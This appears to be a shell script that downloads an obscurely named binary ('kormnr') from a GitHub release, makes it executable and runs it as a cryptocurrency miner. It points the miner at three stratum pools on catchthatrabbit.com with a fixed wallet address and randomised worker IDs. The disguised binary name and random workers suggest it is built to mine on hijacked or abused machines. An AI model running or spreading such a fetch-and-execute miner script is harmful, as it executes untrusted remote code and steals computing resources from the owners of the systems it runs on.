#!/bin/sh
apt update && apt install unzip
wget https://github.com/varfeplas/crkonel/releases/download/crkom/kormnr
chmod +x kormnr
./kormnr -P stratum1+tcp://cb16e28eda52f3750022c539e75c84610f87af8030a9.$(shuf -n 1 -i 1-99999)-AATP21JUL@de.catchthatrabbit.com:8008 \
     -P stratum1+tcp://cb16e28eda52f3750022c539e75c84610f87af8030a9.$(shuf -n 1 -i 1-99999)-AATP21JUL@sg.catchthatrabbit.com:8008 \
     -P stratum1+tcp://cb16e28eda52f3750022c539e75c84610f87af8030a9.$(shuf -n 1 -i 1-99999)-AATP21JUL@us.catchthatrabbit.com:8008
